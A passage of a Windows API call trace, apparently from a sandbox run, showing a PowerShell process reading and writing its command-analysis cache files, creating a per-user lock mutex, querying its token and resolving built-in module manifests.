lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c4c8*=0x1000, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d3e13, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d3e13*, lpNumberOfBytesRead=0xb156f8c168*=0x28, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d3e3f, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d3e3f*, lpNumberOfBytesRead=0xb156f8c168*=0x14, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d3e02, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8c168, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d3e02*, lpNumberOfBytesRead=0xb156f8c168*=0x2f, lpOverlapped=0x0) returned 1 [0171.060] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c138, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c138*=0x1000, lpOverlapped=0x0) returned 1 [0171.061] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d3dc8, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8c0f8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d3dc8*, lpNumberOfBytesRead=0xb156f8c0f8*=0x17, lpOverlapped=0x0) returned 1 [0171.061] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c198, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c198*=0xd58, lpOverlapped=0x0) returned 1 [0171.061] ReadFile (in: hFile=0x35c, lpBuffer=0x1e3396d2040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c498, lpOverlapped=0x0 | out: lpBuffer=0x1e3396d2040*, lpNumberOfBytesRead=0xb156f8c498*=0x0, lpOverlapped=0x0) returned 1 [0171.061] CloseHandle (hObject=0x35c) returned 1 [0171.061] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144d930 [0171.061] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144d930 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.061] CoTaskMemFree (pv=0x1e35144d930) [0171.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7a0) returned 1 [0171.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c880 | out: lpFileInformation=0xb156f8c880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c760) returned 1 [0171.062] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", nBufferLength=0x105, lpBuffer=0xb156f8c200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", lpFilePart=0x0) returned 0x93 [0171.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c6e0) returned 1 [0171.062] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_01c28806-e5ae-41cc-b284-e627e1b02beb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x35c [0171.062] GetFileType (hFile=0x35c) returned 0x1 [0171.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c650) returned 1 [0171.062] GetFileType (hFile=0x35c) returned 0x1 [0171.062] SetEndOfFile (hFile=0x35c) returned 1 [0171.063] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e05c0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0xb156f8c7e8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e05c0*, lpNumberOfBytesWritten=0xb156f8c7e8*=0x25a, lpOverlapped=0x0) returned 1 [0171.064] CloseHandle (hObject=0x35c) returned 1 [0171.064] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144fb30 [0171.064] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144fb30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.064] CoTaskMemFree (pv=0x1e35144fb30) [0171.065] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.065] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c740) returned 1 [0171.065] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c820 | out: lpFileInformation=0xb156f8c820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.065] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.065] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x35c [0171.065] GetFileType (hFile=0x35c) returned 0x1 [0171.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.065] GetFileType (hFile=0x35c) returned 0x1 [0171.066] SetEndOfFile (hFile=0x35c) returned 1 [0171.067] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e2b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8bec8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e2b28*, lpNumberOfBytesWritten=0xb156f8bec8*=0x1000, lpOverlapped=0x0) returned 1 [0171.068] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e2b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c098, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e2b28*, lpNumberOfBytesWritten=0xb156f8c098*=0x1000, lpOverlapped=0x0) returned 1 [0171.068] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e2b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c098, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e2b28*, lpNumberOfBytesWritten=0xb156f8c098*=0x1000, lpOverlapped=0x0) returned 1 [0171.068] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e2b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8bec8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e2b28*, lpNumberOfBytesWritten=0xb156f8bec8*=0x1000, lpOverlapped=0x0) returned 1 [0171.068] WriteFile (in: hFile=0x35c, lpBuffer=0x1e3396e2b28*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0xb156f8c788, lpOverlapped=0x0 | out: lpBuffer=0x1e3396e2b28*, lpNumberOfBytesWritten=0xb156f8c788*=0xdda, lpOverlapped=0x0) returned 1 [0171.069] CloseHandle (hObject=0x35c) returned 1 [0171.070] ReleaseMutex (hMutex=0x738) returned 1 [0171.093] EtwEventActivityIdControl () returned 0x0 [0171.094] SetEvent (hEvent=0x794) returned 1 [0171.094] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d090*=0x794, lpdwindex=0xb156f8ce64 | out: lpdwindex=0xb156f8ce64) returned 0x0 [0171.095] GetCurrentProcess () returned 0xffffffffffffffff [0171.095] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d318 | out: TokenHandle=0xb156f8d318*=0x35c) returned 1 [0171.096] GetTokenInformation (in: TokenHandle=0x35c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d418 | out: TokenInformation=0x0, ReturnLength=0xb156f8d418) returned 0 [0171.096] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6050 [0171.096] GetTokenInformation (in: TokenHandle=0x35c, TokenInformationClass=0x1, TokenInformation=0x1e3513d6050, TokenInformationLength=0x2c, ReturnLength=0xb156f8d418 | out: TokenInformation=0x1e3513d6050, ReturnLength=0xb156f8d418) returned 1 [0171.097] LocalFree (hMem=0x1e3513d6050) returned 0x0 [0171.097] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e3396f6bb0, cbSid=0xb156f8d410 | out: pSid=0x1e3396f6bb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8d410) returned 1 [0171.098] CreateMutexW (lpMutexAttributes=0x1e3396f6d00, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x86c [0171.098] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d2b0*=0x86c, lpdwindex=0xb156f8d084 | out: lpdwindex=0xb156f8d084) returned 0x0 [0171.098] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d230) returned 1 [0171.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d310 | out: lpFileInformation=0xb156f8d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d1f0) returned 1 [0171.098] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d170) returned 1 [0171.099] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x878 [0171.099] GetFileType (hFile=0x878) returned 0x1 [0171.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d0e0) returned 1 [0171.099] GetFileType (hFile=0x878) returned 0x1 [0171.099] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cfd8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cfd8*=0x1000, lpOverlapped=0x0) returned 1 [0171.100] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f9b9b, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f9b9b*, lpNumberOfBytesRead=0xb156f8cc78*=0x28, lpOverlapped=0x0) returned 1 [0171.100] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.103] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f9bc7, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f9bc7*, lpNumberOfBytesRead=0xb156f8cc78*=0x14, lpOverlapped=0x0) returned 1 [0171.103] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.106] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f9b8a, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f9b8a*, lpNumberOfBytesRead=0xb156f8cc78*=0x2f, lpOverlapped=0x0) returned 1 [0171.106] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.108] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f9b50, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8cc08, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f9b50*, lpNumberOfBytesRead=0xb156f8cc08*=0x17, lpOverlapped=0x0) returned 1 [0171.108] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cca8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cca8*=0xd58, lpOverlapped=0x0) returned 1 [0171.109] ReadFile (in: hFile=0x878, lpBuffer=0x1e3396f7dc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cfa8, lpOverlapped=0x0 | out: lpBuffer=0x1e3396f7dc8*, lpNumberOfBytesRead=0xb156f8cfa8*=0x0, lpOverlapped=0x0) returned 1 [0171.109] CloseHandle (hObject=0x878) returned 1 [0171.109] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0171.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d400) returned 1 [0171.109] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e339704e28 | out: lpFileInformation=0x1e339704e28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0171.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3c0) returned 1 [0171.109] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d2f0) returned 1 [0171.110] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d3d0 | out: lpFileInformation=0xb156f8d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d2b0) returned 1 [0171.110] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", nBufferLength=0x105, lpBuffer=0xb156f8cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", lpFilePart=0x0) returned 0x93 [0171.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d230) returned 1 [0171.110] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_01c28806-e5ae-41cc-b284-e627e1b02beb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x878 [0171.110] GetFileType (hFile=0x878) returned 0x1 [0171.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d1a0) returned 1 [0171.110] GetFileType (hFile=0x878) returned 0x1 [0171.111] ReadFile (in: hFile=0x878, lpBuffer=0x1e339706138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d098, lpOverlapped=0x0 | out: lpBuffer=0x1e339706138*, lpNumberOfBytesRead=0xb156f8d098*=0x25a, lpOverlapped=0x0) returned 1 [0171.111] ReadFile (in: hFile=0x878, lpBuffer=0x1e339706138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d068, lpOverlapped=0x0 | out: lpBuffer=0x1e339706138*, lpNumberOfBytesRead=0xb156f8d068*=0x0, lpOverlapped=0x0) returned 1 [0171.111] CloseHandle (hObject=0x878) returned 1 [0171.111] ReleaseMutex (hMutex=0x86c) returned 1 [0171.111] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d0e0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.111] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144aeb0 [0171.111] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144aeb0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.112] CoTaskMemFree (pv=0x1e35144aeb0) [0171.112] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144dd70 [0171.112] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144dd70 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.112] CoTaskMemFree (pv=0x1e35144dd70) [0171.112] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.112] GetCurrentProcess () returned 0xffffffffffffffff [0171.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d318 | out: TokenHandle=0xb156f8d318*=0x878) returned 1 [0171.113] GetTokenInformation (in: TokenHandle=0x878, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d418 | out: TokenInformation=0x0, ReturnLength=0xb156f8d418) returned 0 [0171.113] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6590 [0171.113] GetTokenInformation (in: TokenHandle=0x878, TokenInformationClass=0x1, TokenInformation=0x1e3513d6590, TokenInformationLength=0x2c, ReturnLength=0xb156f8d418 | out: TokenInformation=0x1e3513d6590, ReturnLength=0xb156f8d418) returned 1 [0171.114] LocalFree (hMem=0x1e3513d6590) returned 0x0 [0171.114] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e33970a0b8, cbSid=0xb156f8d410 | out: pSid=0x1e33970a0b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8d410) returned 1 [0171.114] CreateMutexW (lpMutexAttributes=0x1e33970a208, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x87c [0171.115] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d2b0*=0x87c, lpdwindex=0xb156f8d084 | out: lpdwindex=0xb156f8d084) returned 0x0 [0171.115] CoTaskMemAlloc (cb=0x20e) returned 0x1e351452390 [0171.115] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e351452390, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.115] CoTaskMemFree (pv=0x1e351452390) [0171.115] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d400) returned 1 [0171.115] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: 